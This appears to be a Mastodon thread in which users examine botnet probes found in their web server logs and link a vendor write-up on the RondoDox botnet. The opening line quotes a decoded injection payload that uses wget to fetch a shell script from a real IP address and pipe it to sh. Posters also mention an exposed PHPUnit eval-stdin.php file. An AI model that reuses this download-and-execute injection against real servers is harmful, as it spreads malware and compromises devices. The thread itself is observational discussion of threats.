Decodes to:
cat_id=${system(wget -qO- http://74.194.191.52/rondo.wcr.sh|sh)}
I have to admire the use of POSIX-compliant shell.
Payload is here if anyone is curious: https://pastes.io/wcrrondosh
Obviously don't run it but I love that if you get down far enough it will try to execute a Motorola 68k binary
4.217.221.207 - - [12/Nov/2025:23:27:53 +0000] "GET /xmrlpc.php HTTP/1.1" 404 146 "-" "-"
That's not how you spell xmlrpc, and that's not where wordpress puts that
I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat
Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol
Based on nginx logs there is a package called phpunit which ships a file called, and I am 100% serious, `eval-stdin.php`.
Feels like security research is 10% the most intense shit you've ever seen and 90% "oh no! we left the untrusted strings next to the String Executor!"
@wren6991 i briefly researched this at one point (as I’ve also seen this in my logs)
turns out that this was a part of their test suite that wasn’t supposed to be shipped on any public pages. so in most cases it was downstream’s fault for leaving the composer package directory below the webroot, i suppose?
PHP is full of really idiotic gotchas like this, i swear there’s no reason for the structure to be like this
Security conference talks fall into two categories * we designed a distributed entropy siphon to perform a black-box hypervisor side channel escape and chain-load a persistent rootkit into the CPU cache * we looked behind the sofa and found an entire industry of products/services that have made no attempt at security at all and are therefore vulnerable to the most basic issues that we've been finding in everything for the past 30 years, and no-one else had bothered to look.
@whitequark @wren6991 "They built for everything" is what i686/i586/i486 suggests to me (AIUI they could just use the i486 binary for all of those, and I'm a little surprised there's no i386).
Also m68k, sparc, and sh4!
@whitequark @wren6991 Given https://types.pl/@wren6991/115539436810358737 I assume it's some random networked device. Wikipedia says "car multimedia terminals, video game consoles, ... or set-top boxes"; maybe some set-top boxes have an HTTP control interface? IP camera?
68k seems more surprising/worrying, since when I last checked they had terrible performance (<100 MHz I think?) and were also really pricey. I assume they're used in industrial-type things that *really* shouldn't be exposed to the internet.
I'd guess it's a variant of this: https://www.fortinet.com/blog/threat-research/rondobox-unveiled-breaking-down-a-botnet-threat Mine has an identical init.d script format string embedded, not obfuscated, it just comes out with `strings` lol
Luke Wren
aks
dmi 💽 
Dave bauer
Ölbaum
Michael
✧✦Catherine✦✧
SnowFox